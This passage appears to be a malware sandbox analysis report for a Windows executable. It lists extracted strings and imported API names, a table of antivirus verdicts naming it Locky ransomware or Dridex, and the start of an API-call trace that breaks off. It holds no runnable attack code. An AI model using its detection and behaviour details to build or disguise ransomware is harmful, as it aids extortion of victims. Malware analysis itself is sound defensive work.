<div>Microsoft Visual C++ Runtime Library</div>
<div>&lt;program name unknown&gt;</div>
<div>Runtime Error!</div>
<div>Program: </div>
<div>Unknown exception</div>
<div>LC_TIME</div>
<div>LC_NUMERIC</div>
<div>LC_MONETARY</div>
<div>LC_CTYPE</div>
<div>LC_COLLATE</div>
<div>LC_ALL</div>
<div> !&quot;#$%&amp;&#39;()*+,-./0123456789:;&lt;=&gt;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~</div>
<div>SystemFunction036</div>
<div>ADVAPI32.DLL</div>
<div>InitializeCriticalSectionAndSpinCount</div>
<div>kernel32.dll</div>
<div>GetProcessWindowStation</div>
<div>GetUserObjectInformationA</div>
<div>GetLastActivePopup</div>
<div>GetActiveWindow</div>
<div>MessageBoxA</div>
<div>USER32.DLL</div>
<div> !&quot;#$%&amp;&#39;()*+,-./0123456789:;&lt;=&gt;?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~</div>
<div> !&quot;#$%&amp;&#39;()*+,-./0123456789:;&lt;=&gt;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~</div>
<div>HH:mm:ss</div>
<div>dddd, MMMM dd, yyyy</div>
<div>MM/dd/yy</div>
<div>December</div>
<div>November</div>
<div>October</div>
<div>September</div>
<div>August</div>
<div>February</div>
<div>January</div>
<div>Saturday</div>
<div>Friday</div>
<div>Thursday</div>
<div>Wednesday</div>
<div>Tuesday</div>
<div>Monday</div>
<div>Sunday</div>
<div>united-states</div>
<div>united-kingdom</div>
<div>trinidad &amp; tobago</div>
<div>south-korea</div>
<div>south-africa</div>
<div>south korea</div>
<div>south africa</div>
<div>slovak</div>
<div>puerto-rico</div>
<div>pr-china</div>
<div>pr china</div>
<div>new-zealand</div>
<div>hong-kong</div>
<div>holland</div>
<div>great britain</div>
<div>england</div>
<div>britain</div>
<div>america</div>
<div>swedish-finland</div>
<div>spanish-venezuela</div>
<div>spanish-uruguay</div>
<div>spanish-puerto rico</div>
<div>spanish-peru</div>
<div>spanish-paraguay</div>
<div>spanish-panama</div>
<div>spanish-nicaragua</div>
<div>spanish-modern</div>
<div>spanish-mexican</div>
<div>spanish-honduras</div>
<div>spanish-guatemala</div>
<div>spanish-el salvador</div>
<div>spanish-ecuador</div>
<div>spanish-dominican republic</div>
<div>spanish-costa rica</div>
<div>spanish-colombia</div>
<div>spanish-chile</div>
<div>spanish-bolivia</div>
<div>spanish-argentina</div>
<div>portuguese-brazilian</div>
<div>norwegian-nynorsk</div>
<div>norwegian-bokmal</div>
<div>norwegian</div>
<div>italian-swiss</div>
<div>irish-english</div>
<div>german-swiss</div>
<div>german-luxembourg</div>
<div>german-lichtenstein</div>
<div>german-austrian</div>
<div>french-swiss</div>
<div>french-luxembourg</div>
<div>french-canadian</div>
<div>french-belgian</div>
<div>english-usa</div>
<div>english-us</div>
<div>english-uk</div>
<div>english-trinidad y tobago</div>
<div>english-south africa</div>
<div>english-nz</div>
<div>english-jamaica</div>
<div>english-ire</div>
<div>english-caribbean</div>
<div>english-can</div>
<div>english-belize</div>
<div>english-aus</div>
<div>english-american</div>
<div>dutch-belgian</div>
<div>chinese-traditional</div>
<div>chinese-singapore</div>
<div>chinese-simplified</div>
<div>chinese-hongkong</div>
<div>chinese</div>
<div>canadian</div>
<div>belgian</div>
<div>australian</div>
<div>american-english</div>
<div>american english</div>
<div>american</div>
<div>Norwegian-Nynorsk</div>
<div> Complete Object Locator&#39;</div>
<div> Class Hierarchy Descriptor&#39;</div>
<div> Base Class Array&#39;</div>
<div> Base Class Descriptor at (</div>
<div> Type Descriptor&#39;</div>
<div>`local static thread guard&#39;</div>
<div>`managed vector copy constructor iterator&#39;</div>
<div>`vector vbase copy constructor iterator&#39;</div>
<div>`vector copy constructor iterator&#39;</div>
<div>`dynamic atexit destructor for &#39;</div>
<div>`dynamic initializer for &#39;</div>
<div>`eh vector vbase copy constructor iterator&#39;</div>
<div>`eh vector copy constructor iterator&#39;</div>
<div>`managed vector destructor iterator&#39;</div>
<div>`managed vector constructor iterator&#39;</div>
<div>`placement delete[] closure&#39;</div>
<div>`placement delete closure&#39;</div>
<div>`omni callsig&#39;</div>
<div> delete[]</div>
<div> new[]</div>
<div>`local vftable constructor closure&#39;</div>
<div>`local vftable&#39;</div>
<div>`udt returning&#39;</div>
<div>`copy constructor closure&#39;</div>
<div>`eh vector vbase constructor iterator&#39;</div>
<div>`eh vector destructor iterator&#39;</div>
<div>`eh vector constructor iterator&#39;</div>
<div>`virtual displacement map&#39;</div>
<div>`vector vbase constructor iterator&#39;</div>
<div>`vector destructor iterator&#39;</div>
<div>`vector constructor iterator&#39;</div>
<div>`scalar deleting destructor&#39;</div>
<div>`default constructor closure&#39;</div>
<div>`vector deleting destructor&#39;</div>
<div>`vbase destructor&#39;</div>
<div>`string&#39;</div>
<div>`local static guard&#39;</div>
<div>`typeof&#39;</div>
<div>`vcall&#39;</div>
<div>`vbtable&#39;</div>
<div>`vftable&#39;</div>
<div>operator</div>
<div> delete</div>
<div>__unaligned</div>
<div>__restrict</div>
<div>__ptr64</div>
<div>__clrcall</div>
<div>__fastcall</div>
<div>__thiscall</div>
<div>__stdcall</div>
<div>__pascal</div>
<div>__cdecl</div>
<div>__based(</div>
<div>{flat}</div>
<div>`non-type-template-parameter</div>
<div>unsigned </div>
<div>short </div>
<div>&lt;ellipsis&gt;</div>
<div>,&lt;ellipsis&gt;</div>
<div> throw(</div>
<div>`template-parameter</div>
<div>cli::pin_ptr&lt;</div>
<div>cli::array&lt;</div>
<div>`anonymous namespace&#39;</div>
<div>generic-type-</div>
<div>template-parameter-</div>
<div>`unknown ecsu&#39;</div>
<div>union </div>
<div>struct </div>
<div>class </div>
<div>coclass </div>
<div>cointerface </div>
<div>extern &quot;C&quot; </div>
<div>[thunk]:</div>
<div>public: </div>
<div>protected: </div>
<div>private: </div>
<div>virtual </div>
<div>static </div>
<div>`template static data member destructor helper&#39;</div>
<div>`template static data member constructor helper&#39;</div>
<div>`local static destructor helper&#39;</div>
<div>`adjustor{</div>
<div>`vtordisp{</div>
<div>`vtordispex{</div>
<div>const </div>
<div>volatile </div>
<div>volatile</div>
<div> volatile</div>
<div>signed </div>
<div>double</div>
<div>wchar_t</div>
<div>UNKNOWN</div>
<div>__int128</div>
<div>__int32</div>
<div>__int64</div>
<div>__int16</div>
<div>__w64 </div>
<div>__int8</div>
<div>SunMonTueWedThuFriSat</div>
<div>JanFebMarAprMayJunJulAugSepOctNovDec</div>
<div>MessageBoxW</div>
<div>SetRect</div>
<div>SetCursor</div>
<div>ReleaseDC</div>
<div>IsChild</div>
<div>ChildWindowFromPoint</div>
<div>CreateWindowExA</div>
<div>ShowWindowAsync</div>
<div>LoadStringW</div>
<div>TranslateMessage</div>
<div>GetDlgItemInt</div>
<div>GetCursorPos</div>
<div>DrawFocusRect</div>
<div>GetDCEx</div>
<div>SetRectEmpty</div>
<div>SetMenuItemInfoW</div>
<div>LoadIconA</div>
<div>SendMessageA</div>
<div>GetWindowLongA</div>
<div>EmptyClipboard</div>
<div>SetWindowTextA</div>
<div>MapWindowPoints</div>
<div>GetFocus</div>
<div>BeginPaint</div>
<div>EnableMenuItem</div>
<div>UpdateWindow</div>
<div>SetParent</div>
<div>USER32.dll</div>
<div>GetEnvironmentStrings</div>
<div>GetCurrentThread</div>
<div>VirtualAlloc</div>
<div>GetVersionExA</div>
<div>GetProcAddress</div>
<div>LoadLibraryA</div>
<div>FreeLibrary</div>
<div>GetModuleFileNameA</div>
<div>lstrlenW</div>
<div>HeapAlloc</div>
<div>CloseHandle</div>
<div>MultiByteToWideChar</div>
<div>EnterCriticalSection</div>
<div>GetCurrentProcess</div>
<div>FindFirstFileW</div>
<div>GetStdHandle</div>
<div>CreateFileA</div>
<div>LocalFree</div>
<div>GetVersionExW</div>
<div>GetCommandLineW</div>
<div>CreateEventW</div>
<div>LeaveCriticalSection</div>
<div>HeapDestroy</div>
<div>TerminateProcess</div>
<div>KERNEL32.dll</div>
<div>RtlUnwind</div>
<div>HeapFree</div>
<div>GetProcessHeap</div>
<div>GetStartupInfoW</div>
<div>GetModuleHandleA</div>
<div>TlsGetValue</div>
<div>TlsAlloc</div>
<div>TlsSetValue</div>
<div>TlsFree</div>
<div>InterlockedIncrement</div>
<div>SetLastError</div>
<div>GetCurrentThreadId</div>
<div>GetLastError</div>
<div>InterlockedDecrement</div>
<div>ExitProcess</div>
<div>WriteFile</div>
<div>UnhandledExceptionFilter</div>
<div>GetModuleFileNameW</div>
<div>FreeEnvironmentStringsA</div>
<div>FreeEnvironmentStringsW</div>
<div>GetEnvironmentStringsW</div>
<div>GetCommandLineA</div>
<div>SetHandleCount</div>
<div>GetFileType</div>
<div>GetStartupInfoA</div>
<div>DeleteCriticalSection</div>
<div>HeapCreate</div>
<div>VirtualFree</div>
<div>QueryPerformanceCounter</div>
<div>GetTickCount</div>
<div>GetCurrentProcessId</div>
<div>GetSystemTimeAsFileTime</div>
<div>SetUnhandledExceptionFilter</div>
<div>RaiseException</div>
<div>IsDebuggerPresent</div>
<div>FatalAppExitA</div>
<div>GetCPInfo</div>
<div>GetACP</div>
<div>GetOEMCP</div>
<div>SetConsoleCtrlHandler</div>
<div>InterlockedExchange</div>
<div>InitializeCriticalSection</div>
<div>HeapReAlloc</div>
<div>GetTimeFormatA</div>
<div>GetDateFormatA</div>
<div>GetUserDefaultLCID</div>
<div>GetLocaleInfoA</div>
<div>EnumSystemLocalesA</div>
<div>IsValidLocale</div>
<div>IsValidCodePage</div>
<div>GetStringTypeA</div>
<div>GetStringTypeW</div>
<div>LCMapStringA</div>
<div>WideCharToMultiByte</div>
<div>LCMapStringW</div>
<div>HeapSize</div>
<div>GetLocaleInfoW</div>
<div>GetTimeZoneInformation</div>
<div>CompareStringA</div>
<div>CompareStringW</div>
<div>SetEnvironmentVariableA</div>
<div>Qx/y|:[</div>
<div>ko&quot;FVi1</div>
<div>qe$FVi1</div>
<div>gdl+Fus$</div>
<div>.?AVbad_exception@std@@</div>
<div>.?AVexception@std@@</div>
<div>.?AVbad_cast@std@@</div>
<div>.?AVbad_typeid@std@@</div>
<div>.?AV__non_rtti_object@std@@</div>
<div>.?AVtype_info@@</div>
<div> </div>
<div>abcdefghijklmnopqrstuvwxyz</div>
<div>ABCDEFGHIJKLMNOPQRSTUVWXYZ</div>
<div> </div>
<div>abcdefghijklmnopqrstuvwxyz</div>
<div>ABCDEFGHIJKLMNOPQRSTUVWXYZ</div>
<div>.?AVDNameNode@@</div>
<div>.?AVcharNode@@</div>
<div>.?AVpDNameNode@@</div>
<div>.?AVDNameStatusNode@@</div>
<div>.?AVpcharNode@@</div>
<div> ((((( H</div>
<div> h(((( H</div>
<div> H</div>
</div>
</section>
</div>
<div class="tab-pane fade" id="static_antivirus_tab">
<section id="static_antivirus">
<table class="table table-striped table-bordered">
<tr>
<th>Antivirus</th>
<th>Signature</th>
</tr>
<tr>
<td>Bkav</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>MicroWorld-eScan</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>nProtect</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>CMC</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>CAT-QuickHeal</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>McAfee</td>
<td>
<span class="text-error">Artemis!E1A9B6F7285A</span>
</td>
</tr>
<tr>
<td>Malwarebytes</td>
<td>
<span class="text-error">Ransom.Locky</span>
</td>
</tr>
<tr>
<td>Zillya</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>AegisLab</td>
<td>
<span class="text-error">Troj.W32.Reconyc!c</span>
</td>
</tr>
<tr>
<td>TheHacker</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>Alibaba</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>K7GW</td>
<td>
<span class="text-error">Trojan ( 004de6971 )</span>
</td>
</tr>
<tr>
<td>K7AntiVirus</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>NANO-Antivirus</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>F-Prot</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>Symantec</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>ESET-NOD32</td>
<td>
<span class="text-error">Win32/Filecoder.NFX</span>
</td>
</tr>
<tr>
<td>TrendMicro-HouseCall</td>
<td>
<span class="text-error">TSPY_DRIDEX.YYSRF</span>
</td>
</tr>
<tr>
<td>Avast</td>
<td>
<span class="text-error">Win32:Malware-gen</span>
</td>
</tr>
<tr>
<td>ClamAV</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>GData</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>Kaspersky</td>
<td>
<span class="text-error">Trojan.Win32.Reconyc.ffkp</span>
</td>
</tr>
<tr>
<td>BitDefender</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>Agnitum</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>SUPERAntiSpyware</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>ByteHero</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>Rising</td>
<td>
<span class="text-error">PE:Malware.Generic/QRS!1.9E2D [F]</span>
</td>
</tr>
<tr>
<td>Ad-Aware</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>Emsisoft</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>Comodo</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>F-Secure</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>DrWeb</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>VIPRE</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>TrendMicro</td>
<td>
<span class="text-error">TSPY_DRIDEX.YYSRF</span>
</td>
</tr>
<tr>
<td>McAfee-GW-Edition</td>
<td>
<span class="text-error">Artemis!Trojan</span>
</td>
</tr>
<tr>
<td>Sophos</td>
<td>
<span class="text-error">Troj/Ransom-CGX</span>
</td>
</tr>
<tr>
<td>Cyren</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>Jiangmin</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>Avira</td>
<td>
<span class="text-error">TR/Crypt.EPACK.24719</span>
</td>
</tr>
<tr>
<td>Antiy-AVL</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>Arcabit</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>ViRobot</td>
<td>
<span class="text-error">Trojan.Win32.Locky-Ransom.208896[h]</span>
</td>
</tr>
<tr>
<td>Microsoft</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>AhnLab-V3</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>ALYac</td>
<td>
<span class="text-error">Trojan.Ransom.LockyCrypt</span>
</td>
</tr>
<tr>
<td>VBA32</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>Panda</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>Zoner</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>Tencent</td>
<td>
<span class="text-error">Win32.Trojan.Gen.Qbza</span>
</td>
</tr>
<tr>
<td>Ikarus</td>
<td>
<span class="text-error">Trojan.Win32.Filecoder</span>
</td>
</tr>
<tr>
<td>Fortinet</td>
<td>
<span class="text-error">W32/Kryptik.EODW!tr</span>
</td>
</tr>
<tr>
<td>AVG</td>
<td>
<span class="text-error">Generic_r.HMH</span>
</td>
</tr>
<tr>
<td>Baidu-International</td>
<td>
<span class="muted">Clean</span>
</td>
</tr>
<tr>
<td>Qihoo-360</td>
<td>
<span class="text-error">HEUR/QVM09.0.Malware.Gen</span>
</td>
</tr>
</table>
</section>
</div>
</div>
</div>
</div>
<div class="tab-pane fade" id="behavior">
<div id="graph_process_overview"><noscript>requires javascript to run</noscript></div>
<div id="graph_process_details"><noscript>requires javascript to run</noscript></div>
<div id="buttons">
<ul>
<li>X-axis by: <a id="graph_controls_event">loading</a></li>
<li>Y-axis by: <a id="graph_controls_grouping">loading</a></li>
</ul>
</div>
<script type="text/javascript">
var graph_raw_data = [{"parent_id": 1796, "process_name": "65fg67n.exe", "process_id": 1592, "first_seen": "2016-02-16 17:41:35,173", "calls": [{"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "misc", "timestamp": "2016-02-16 17:41:35,193", "api": "GetSystemMetrics"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,193", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,193", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,193", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,193", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,193", "api": "NtQueryInformationFile"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,203", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,203", "api": "VirtualProtectEx"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,203", "api": "VirtualProtectEx"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,203", "api": "NtFreeVirtualMemory"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,203", "api": 